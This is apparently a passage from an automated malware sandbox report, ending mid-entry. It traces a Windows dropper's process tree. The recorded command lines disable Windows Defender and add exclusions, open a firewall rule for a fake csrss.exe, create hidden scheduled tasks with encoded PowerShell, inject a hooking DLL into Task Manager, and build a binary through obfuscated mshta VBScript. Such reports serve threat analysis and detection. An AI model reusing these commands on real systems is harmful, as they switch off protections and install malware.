Token: SeDebugPrivilege	3996	powershell.exe
Token: SeDebugPrivilege	1216	powershell.exe
Token: SeCreateTokenPrivilege	4572	Wed218c3c4f53dbe01.exe
Token: SeAssignPrimaryTokenPrivilege	4572	Wed218c3c4f53dbe01.exe
Token: SeLockMemoryPrivilege	4572	Wed218c3c4f53dbe01.exe
Token: SeIncreaseQuotaPrivilege	4572	Wed218c3c4f53dbe01.exe
Token: SeMachineAccountPrivilege	4572	Wed218c3c4f53dbe01.exe
Token: SeTcbPrivilege	4572	Wed218c3c4f53dbe01.exe
Token: SeSecurityPrivilege	4572	Wed218c3c4f53dbe01.exe
Token: SeTakeOwnershipPrivilege	4572	Wed218c3c4f53dbe01.exe
Token: SeLoadDriverPrivilege	4572	Wed218c3c4f53dbe01.exe
Token: SeSystemProfilePrivilege	4572	Wed218c3c4f53dbe01.exe
Token: SeSystemtimePrivilege	4572	Wed218c3c4f53dbe01.exe
Token: SeProfSingleProcessPrivilege	4572	Wed218c3c4f53dbe01.exe
Token: SeIncBasePriorityPrivilege	4572	Wed218c3c4f53dbe01.exe
Token: SeCreatePagefilePrivilege	4572	Wed218c3c4f53dbe01.exe
Token: SeCreatePermanentPrivilege	4572	Wed218c3c4f53dbe01.exe
Token: SeBackupPrivilege	4572	Wed218c3c4f53dbe01.exe
Token: SeRestorePrivilege	4572	Wed218c3c4f53dbe01.exe
Token: SeShutdownPrivilege	4572	Wed218c3c4f53dbe01.exe
Token: SeDebugPrivilege	4572	Wed218c3c4f53dbe01.exe
Token: SeAuditPrivilege	4572	Wed218c3c4f53dbe01.exe
Token: SeSystemEnvironmentPrivilege	4572	Wed218c3c4f53dbe01.exe
Token: SeChangeNotifyPrivilege	4572	Wed218c3c4f53dbe01.exe
Token: SeRemoteShutdownPrivilege	4572	Wed218c3c4f53dbe01.exe
Token: SeUndockPrivilege	4572	Wed218c3c4f53dbe01.exe
Token: SeSyncAgentPrivilege	4572	Wed218c3c4f53dbe01.exe
Token: SeEnableDelegationPrivilege	4572	Wed218c3c4f53dbe01.exe
Token: SeManageVolumePrivilege	4572	Wed218c3c4f53dbe01.exe
Token: SeImpersonatePrivilege	4572	Wed218c3c4f53dbe01.exe
Token: SeCreateGlobalPrivilege	4572	Wed218c3c4f53dbe01.exe
Token: 31	4572	Wed218c3c4f53dbe01.exe
Token: 32	4572	Wed218c3c4f53dbe01.exe
Token: 33	4572	Wed218c3c4f53dbe01.exe
Token: 34	4572	Wed218c3c4f53dbe01.exe
Token: 35	4572	Wed218c3c4f53dbe01.exe
Token: SeDebugPrivilege	2472	Wed21d25f5841.exe
Token: SeDebugPrivilege	1564	taskkill.exe
Token: SeDebugPrivilege	1572	taskkill.exe
Token: SeShutdownPrivilege	652
Token: SeCreatePagefilePrivilege	652
Token: SeShutdownPrivilege	652
Token: SeCreatePagefilePrivilege	652
Token: SeShutdownPrivilege	652
Token: SeCreatePagefilePrivilege	652
Token: SeShutdownPrivilege	652
Token: SeCreatePagefilePrivilege	652
Token: SeShutdownPrivilege	652
Token: SeCreatePagefilePrivilege	652
Token: SeShutdownPrivilege	652
Token: SeCreatePagefilePrivilege	652
Token: SeShutdownPrivilege	652
Token: SeCreatePagefilePrivilege	652
Token: SeShutdownPrivilege	652
Token: SeCreatePagefilePrivilege	652
Token: SeShutdownPrivilege	652
Token: SeCreatePagefilePrivilege	652
Token: SeShutdownPrivilege	652
Token: SeCreatePagefilePrivilege	652
Token: SeShutdownPrivilege	652
Token: SeCreatePagefilePrivilege	652
Token: SeShutdownPrivilege	652
Token: SeCreatePagefilePrivilege	652

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

joDqge54Tv9NCgW49aAyCCam.tmp

pid process

9600 joDqge54Tv9NCgW49aAyCCam.tmp

pid	process
9600	joDqge54Tv9NCgW49aAyCCam.tmp

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

5A5158C712E1588C621124B5DC4B0C3EBFC064FFC0E2C.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 368 wrote to memory of 4456	368	5A5158C712E1588C621124B5DC4B0C3EBFC064FFC0E2C.exe	setup_install.exe
PID 368 wrote to memory of 4456	368	5A5158C712E1588C621124B5DC4B0C3EBFC064FFC0E2C.exe	setup_install.exe
PID 368 wrote to memory of 4456	368	5A5158C712E1588C621124B5DC4B0C3EBFC064FFC0E2C.exe	setup_install.exe
PID 4456 wrote to memory of 4180	4456	setup_install.exe	cmd.exe
PID 4456 wrote to memory of 4180	4456	setup_install.exe	cmd.exe
PID 4456 wrote to memory of 4180	4456	setup_install.exe	cmd.exe
PID 4456 wrote to memory of 4992	4456	setup_install.exe	cmd.exe
PID 4456 wrote to memory of 4992	4456	setup_install.exe	cmd.exe
PID 4456 wrote to memory of 4992	4456	setup_install.exe	cmd.exe
PID 4992 wrote to memory of 3996	4992	cmd.exe	powershell.exe
PID 4992 wrote to memory of 3996	4992	cmd.exe	powershell.exe
PID 4992 wrote to memory of 3996	4992	cmd.exe	powershell.exe
PID 4456 wrote to memory of 1032	4456	setup_install.exe	cmd.exe
PID 4456 wrote to memory of 1032	4456	setup_install.exe	cmd.exe
PID 4456 wrote to memory of 1032	4456	setup_install.exe	cmd.exe
PID 4180 wrote to memory of 1216	4180	cmd.exe	powershell.exe
PID 4180 wrote to memory of 1216	4180	cmd.exe	powershell.exe
PID 4180 wrote to memory of 1216	4180	cmd.exe	powershell.exe
PID 4456 wrote to memory of 2716	4456	setup_install.exe	cmd.exe
PID 4456 wrote to memory of 2716	4456	setup_install.exe	cmd.exe
PID 4456 wrote to memory of 2716	4456	setup_install.exe	cmd.exe
PID 4456 wrote to memory of 4188	4456	setup_install.exe	cmd.exe
PID 4456 wrote to memory of 4188	4456	setup_install.exe	cmd.exe
PID 4456 wrote to memory of 4188	4456	setup_install.exe	cmd.exe
PID 2716 wrote to memory of 3140	2716	cmd.exe	Wed2181d5a4917c14c3.exe
PID 2716 wrote to memory of 3140	2716	cmd.exe	Wed2181d5a4917c14c3.exe
PID 2716 wrote to memory of 3140	2716	cmd.exe	Wed2181d5a4917c14c3.exe
PID 4456 wrote to memory of 3752	4456	setup_install.exe	cmd.exe
PID 4456 wrote to memory of 3752	4456	setup_install.exe	cmd.exe
PID 4456 wrote to memory of 3752	4456	setup_install.exe	cmd.exe
PID 1032 wrote to memory of 3468	1032	cmd.exe	Wed214b8335df03a0f.exe
PID 1032 wrote to memory of 3468	1032	cmd.exe	Wed214b8335df03a0f.exe
PID 1032 wrote to memory of 3468	1032	cmd.exe	Wed214b8335df03a0f.exe
PID 4456 wrote to memory of 3700	4456	setup_install.exe	cmd.exe
PID 4456 wrote to memory of 3700	4456	setup_install.exe	cmd.exe
PID 4456 wrote to memory of 3700	4456	setup_install.exe	cmd.exe
PID 4456 wrote to memory of 2960	4456	setup_install.exe	cmd.exe
PID 4456 wrote to memory of 2960	4456	setup_install.exe	cmd.exe
PID 4456 wrote to memory of 2960	4456	setup_install.exe	cmd.exe
PID 4456 wrote to memory of 4016	4456	setup_install.exe	cmd.exe
PID 4456 wrote to memory of 4016	4456	setup_install.exe	cmd.exe
PID 4456 wrote to memory of 4016	4456	setup_install.exe	cmd.exe
PID 4456 wrote to memory of 2520	4456	setup_install.exe	cmd.exe
PID 4456 wrote to memory of 2520	4456	setup_install.exe	cmd.exe
PID 4456 wrote to memory of 2520	4456	setup_install.exe	cmd.exe
PID 3700 wrote to memory of 880	3700	cmd.exe	Wed21ea78c748a30684.exe
PID 3700 wrote to memory of 880	3700	cmd.exe	Wed21ea78c748a30684.exe
PID 3700 wrote to memory of 880	3700	cmd.exe	Wed21ea78c748a30684.exe
PID 4016 wrote to memory of 4872	4016	cmd.exe	Wed214f6ccf7c811f9d.exe
PID 4016 wrote to memory of 4872	4016	cmd.exe	Wed214f6ccf7c811f9d.exe
PID 4016 wrote to memory of 4872	4016	cmd.exe	Wed214f6ccf7c811f9d.exe
PID 4456 wrote to memory of 2912	4456	setup_install.exe	cmd.exe
PID 4456 wrote to memory of 2912	4456	setup_install.exe	cmd.exe
PID 4456 wrote to memory of 2912	4456	setup_install.exe	cmd.exe
PID 3752 wrote to memory of 4280	3752	cmd.exe	Wed214fc5ff02b7.exe
PID 3752 wrote to memory of 4280	3752	cmd.exe	Wed214fc5ff02b7.exe
PID 4188 wrote to memory of 4460	4188	cmd.exe	Wed21f7d3c36e7eaeca0.exe
PID 4188 wrote to memory of 4460	4188	cmd.exe	Wed21f7d3c36e7eaeca0.exe
PID 4188 wrote to memory of 4460	4188	cmd.exe	Wed21f7d3c36e7eaeca0.exe
PID 2960 wrote to memory of 3664	2960	cmd.exe	Wed2146da156ae.exe
PID 2960 wrote to memory of 3664	2960	cmd.exe	Wed2146da156ae.exe
PID 4456 wrote to memory of 2016	4456	setup_install.exe	cmd.exe
PID 4456 wrote to memory of 2016	4456	setup_install.exe	cmd.exe
PID 4456 wrote to memory of 2016	4456	setup_install.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\5A5158C712E1588C621124B5DC4B0C3EBFC064FFC0E2C.exe
"C:\Users\Admin\AppData\Local\Temp\5A5158C712E1588C621124B5DC4B0C3EBFC064FFC0E2C.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:368

C:\Users\Admin\AppData\Local\Temp\7zS07147A86\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS07147A86\setup_install.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4456

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
3⤵
- Suspicious use of WriteProcessMemory
PID:4180

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1216

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
3⤵
- Suspicious use of WriteProcessMemory
PID:4992

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3996

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed2181d5a4917c14c3.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:2716

C:\Users\Admin\AppData\Local\Temp\7zS07147A86\Wed2181d5a4917c14c3.exe
Wed2181d5a4917c14c3.exe
4⤵
- Executes dropped EXE
PID:3140

C:\Users\Admin\AppData\Local\Temp\7zS07147A86\Wed2181d5a4917c14c3.exe
"C:\Users\Admin\AppData\Local\Temp\7zS07147A86\Wed2181d5a4917c14c3.exe"
5⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
PID:380

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
6⤵
PID:3464

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
7⤵
- Modifies Windows Firewall
PID:3224

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe /306-306
6⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:1732

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
7⤵
- Creates scheduled task(s)
PID:3916

C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
7⤵
PID:1864

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
7⤵
- Executes dropped EXE
PID:1216

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed21c787120ecdf176.exe
3⤵
PID:2520

C:\Users\Admin\AppData\Local\Temp\7zS07147A86\Wed21c787120ecdf176.exe
Wed21c787120ecdf176.exe
4⤵
- Executes dropped EXE
- Checks computer location settings
PID:396

C:\Users\Admin\AppData\Local\Temp\7zS07147A86\Wed21c787120ecdf176.exe
"C:\Users\Admin\AppData\Local\Temp\7zS07147A86\Wed21c787120ecdf176.exe" -u
5⤵
- Executes dropped EXE
PID:2544

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed214f6ccf7c811f9d.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:4016

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed2146da156ae.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:2960

C:\Users\Admin\AppData\Local\Temp\7zS07147A86\Wed2146da156ae.exe
Wed2146da156ae.exe
4⤵
- Executes dropped EXE
PID:3664

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed21ea78c748a30684.exe /mixtwo
3⤵
- Suspicious use of WriteProcessMemory
PID:3700

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed214fc5ff02b7.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:3752

C:\Users\Admin\AppData\Local\Temp\7zS07147A86\Wed214fc5ff02b7.exe
Wed214fc5ff02b7.exe
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4280

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed21f7d3c36e7eaeca0.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:4188

C:\Users\Admin\AppData\Local\Temp\7zS07147A86\Wed21f7d3c36e7eaeca0.exe
Wed21f7d3c36e7eaeca0.exe
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4460

C:\Users\Admin\AppData\Local\Temp\7zS07147A86\Wed21f7d3c36e7eaeca0.exe
C:\Users\Admin\AppData\Local\Temp\7zS07147A86\Wed21f7d3c36e7eaeca0.exe
5⤵
- Executes dropped EXE
PID:1152

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed214b8335df03a0f.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:1032

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed21e08690b2d5.exe
3⤵
PID:2912

C:\Users\Admin\AppData\Local\Temp\7zS07147A86\Wed21e08690b2d5.exe
Wed21e08690b2d5.exe
4⤵
- Executes dropped EXE
- Checks computer location settings
PID:4608

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbSCrIpT: CLOSe(cREaTEobJECt ( "WsCRIpt.SHELL" ).run ( "cMD /R coPY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS07147A86\Wed21e08690b2d5.exe"" C9mbNTQ5v~O0SE.exe&&sTArT C9mBNTQ5V~O0SE.Exe /PujgQ8Rc03_82Bzg & If """"== """" for %V In ( ""C:\Users\Admin\AppData\Local\Temp\7zS07147A86\Wed21e08690b2d5.exe"" ) do taskkill /iM ""%~nXV"" /F " , 0,trUE ) )
5⤵
- Checks computer location settings
PID:3892

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R coPY /Y "C:\Users\Admin\AppData\Local\Temp\7zS07147A86\Wed21e08690b2d5.exe" C9mbNTQ5v~O0SE.exe&&sTArT C9mBNTQ5V~O0SE.Exe /PujgQ8Rc03_82Bzg & If ""== "" for %V In ( "C:\Users\Admin\AppData\Local\Temp\7zS07147A86\Wed21e08690b2d5.exe" ) do taskkill /iM "%~nXV" /F
6⤵
PID:1756

C:\Users\Admin\AppData\Local\Temp\C9mbNTQ5v~O0SE.exe
C9mBNTQ5V~O0SE.Exe /PujgQ8Rc03_82Bzg
7⤵
- Executes dropped EXE
- Checks computer location settings
PID:4884

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbSCrIpT: CLOSe(cREaTEobJECt ( "WsCRIpt.SHELL" ).run ( "cMD /R coPY /Y ""C:\Users\Admin\AppData\Local\Temp\C9mbNTQ5v~O0SE.exe"" C9mbNTQ5v~O0SE.exe&&sTArT C9mBNTQ5V~O0SE.Exe /PujgQ8Rc03_82Bzg & If ""/PujgQ8Rc03_82Bzg ""== """" for %V In ( ""C:\Users\Admin\AppData\Local\Temp\C9mbNTQ5v~O0SE.exe"" ) do taskkill /iM ""%~nXV"" /F " , 0,trUE ) )
8⤵
- Checks computer location settings
PID:2224

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R coPY /Y "C:\Users\Admin\AppData\Local\Temp\C9mbNTQ5v~O0SE.exe" C9mbNTQ5v~O0SE.exe&&sTArT C9mBNTQ5V~O0SE.Exe /PujgQ8Rc03_82Bzg & If "/PujgQ8Rc03_82Bzg "== "" for %V In ( "C:\Users\Admin\AppData\Local\Temp\C9mbNTQ5v~O0SE.exe" ) do taskkill /iM "%~nXV" /F
9⤵
PID:752

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscRIPt:close ( cREATeObJeCt ( "WSCRipt.SheLL" ). RuN( "C:\Windows\system32\cmd.exe /Q /c ECho | seT /P = ""MZ"" > _QRSLO9.L & CopY /b /Y _qRSLO9.L+ LxHL.t + EUH6BRBF.V + aKX0t5vQ.6Lm +KJ8R1EBO.NXR 7DPLg52t.~ & StaRT msiexec.exe /y .\7DPLG52t.~ " , 0,trUE ) )
8⤵
- Checks computer location settings
PID:1468

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /Q /c ECho | seT /P = "MZ" >_QRSLO9.L &CopY /b /Y _qRSLO9.L+ LxHL.t +EUH6BRBF.V+aKX0t5vQ.6Lm +KJ8R1EBO.NXR 7DPLg52t.~ & StaRT msiexec.exe /y .\7DPLG52t.~
9⤵
PID:4500

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECho "
10⤵
PID:4656

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>_QRSLO9.L"
10⤵
PID:1712

C:\Windows\SysWOW64\msiexec.exe
msiexec.exe /y .\7DPLG52t.~
10⤵
- Loads dropped DLL
PID:4696

C:\Windows\SysWOW64\taskkill.exe
taskkill /iM "Wed21e08690b2d5.exe" /F
7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1564

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed21d25f5841.exe
3⤵
PID:1720

C:\Users\Admin\AppData\Local\Temp\7zS07147A86\Wed21d25f5841.exe
Wed21d25f5841.exe
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2472

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed218c3c4f53dbe01.exe
3⤵
PID:4204

C:\Users\Admin\AppData\Local\Temp\7zS07147A86\Wed218c3c4f53dbe01.exe
Wed218c3c4f53dbe01.exe
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4572

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
5⤵
PID:3260

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1572

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed21d24a91bba8252.exe
3⤵
PID:4532

C:\Users\Admin\AppData\Local\Temp\7zS07147A86\Wed21d24a91bba8252.exe
Wed21d24a91bba8252.exe
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1296

C:\Users\Admin\AppData\Local\Temp\7zS07147A86\Wed21d24a91bba8252.exe
C:\Users\Admin\AppData\Local\Temp\7zS07147A86\Wed21d24a91bba8252.exe
5⤵
- Executes dropped EXE
PID:4420

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed21852ed61e6a343.exe
3⤵
PID:1852

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed2135bd1920.exe
3⤵
PID:2016

C:\Users\Admin\AppData\Local\Temp\7zS07147A86\Wed214b8335df03a0f.exe
Wed214b8335df03a0f.exe
1⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Checks computer location settings
PID:3468

C:\Users\Admin\Pictures\Adobe Films\Y6g_9ghG2LvGxIQtlbpjnUyZ.exe
"C:\Users\Admin\Pictures\Adobe Films\Y6g_9ghG2LvGxIQtlbpjnUyZ.exe"
2⤵
- Executes dropped EXE
PID:4936

C:\Users\Admin\Pictures\Adobe Films\Y6g_9ghG2LvGxIQtlbpjnUyZ.exe
"C:\Users\Admin\Pictures\Adobe Films\Y6g_9ghG2LvGxIQtlbpjnUyZ.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
PID:8032

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\065ffed1-a0e1-4fb9-aa1e-5a6569453ab9" /deny *S-1-1-0:(OI)(CI)(DE,DC)
4⤵
- Modifies file permissions
PID:8640

C:\Users\Admin\Pictures\Adobe Films\Y6g_9ghG2LvGxIQtlbpjnUyZ.exe
"C:\Users\Admin\Pictures\Adobe Films\Y6g_9ghG2LvGxIQtlbpjnUyZ.exe" --Admin IsNotAutoStart IsNotTask
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:9664

C:\Users\Admin\Pictures\Adobe Films\Y6g_9ghG2LvGxIQtlbpjnUyZ.exe
"C:\Users\Admin\Pictures\Adobe Films\Y6g_9ghG2LvGxIQtlbpjnUyZ.exe" --Admin IsNotAutoStart IsNotTask
5⤵
PID:8096

C:\Users\Admin\AppData\Local\acfc0ac9-d8bd-4e38-81bf-88201b12a109\build2.exe
"C:\Users\Admin\AppData\Local\acfc0ac9-d8bd-4e38-81bf-88201b12a109\build2.exe"
6⤵
PID:8920

C:\Users\Admin\AppData\Local\acfc0ac9-d8bd-4e38-81bf-88201b12a109\build2.exe
"C:\Users\Admin\AppData\Local\acfc0ac9-d8bd-4e38-81bf-88201b12a109\build2.exe"
7⤵
PID:10524

C:\Users\Admin\AppData\Local\acfc0ac9-d8bd-4e38-81bf-88201b12a109\build3.exe
"C:\Users\Admin\AppData\Local\acfc0ac9-d8bd-4e38-81bf-88201b12a109\build3.exe"
6⤵
PID:10424

C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
7⤵
- Creates scheduled task(s)
PID:10460

C:\Users\Admin\Pictures\Adobe Films\6C9E1BGEBW1wZRwgHbmbPXoY.exe
"C:\Users\Admin\Pictures\Adobe Films\6C9E1BGEBW1wZRwgHbmbPXoY.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:824

C:\Users\Admin\Pictures\Adobe Films\6C9E1BGEBW1wZRwgHbmbPXoY.exe
"C:\Users\Admin\Pictures\Adobe Films\6C9E1BGEBW1wZRwgHbmbPXoY.exe"
3⤵
- Executes dropped EXE
PID:3188

C:\Users\Admin\Pictures\Adobe Films\dXyl1h2kEhXgWB8VOfhl1BpG.exe
"C:\Users\Admin\Pictures\Adobe Films\dXyl1h2kEhXgWB8VOfhl1BpG.exe"
2⤵
- Executes dropped EXE
PID:2564

C:\Users\Admin\Pictures\Adobe Films\XYAT0f2mxbcq323DID_U7lFu.exe
"C:\Users\Admin\Pictures\Adobe Films\XYAT0f2mxbcq323DID_U7lFu.exe"
2⤵
- Executes dropped EXE
PID:4448

C:\Users\Admin\AppData\Local\Temp\7zSC66D.tmp\Install.exe
.\Install.exe
3⤵
- Executes dropped EXE
PID:3272

C:\Users\Admin\AppData\Local\Temp\7zSD60D.tmp\Install.exe
.\Install.exe /S /site_id "525403"
4⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
PID:7992

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
5⤵
PID:8704

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
6⤵
PID:8844

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
7⤵
PID:8888

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
7⤵
PID:9076

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
5⤵
PID:8832

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
6⤵
PID:8992

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
7⤵
PID:9128

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
7⤵
PID:9212

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "glMZmiFJT" /SC once /ST 02:48:00 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
5⤵
- Creates scheduled task(s)
PID:2176

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "glMZmiFJT"
5⤵
PID:9364

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "glMZmiFJT"
5⤵
PID:10968

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bGZpGlqvDNKjraWjlZ" /SC once /ST 09:44:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\ZLgVhFi.exe\" d8 /site_id 525403 /S" /V1 /F
5⤵
- Creates scheduled task(s)
PID:10448

C:\Users\Admin\Pictures\Adobe Films\s0E2ywOLPU4tRzP1Aeab6Hmc.exe
"C:\Users\Admin\Pictures\Adobe Films\s0E2ywOLPU4tRzP1Aeab6Hmc.exe"
2⤵
- Executes dropped EXE
PID:4608

C:\Users\Admin\Pictures\Adobe Films\m76D27Rc3RtyxWBYhsjGBluV.exe
"C:\Users\Admin\Pictures\Adobe Films\m76D27Rc3RtyxWBYhsjGBluV.exe"
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:5012

C:\Users\Admin\Pictures\Adobe Films\uDDcuNpQTvTCz2c7PHxhjlvt.exe
"C:\Users\Admin\Pictures\Adobe Films\uDDcuNpQTvTCz2c7PHxhjlvt.exe"
2⤵
- Executes dropped EXE
PID:2548

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2548 -s 456
3⤵
- Program crash
PID:8136

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2548 -s 768
3⤵
- Program crash
PID:8732

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2548 -s 776
3⤵
- Program crash
PID:9052

C:\Windows\SysWOW64\WerFault.exe
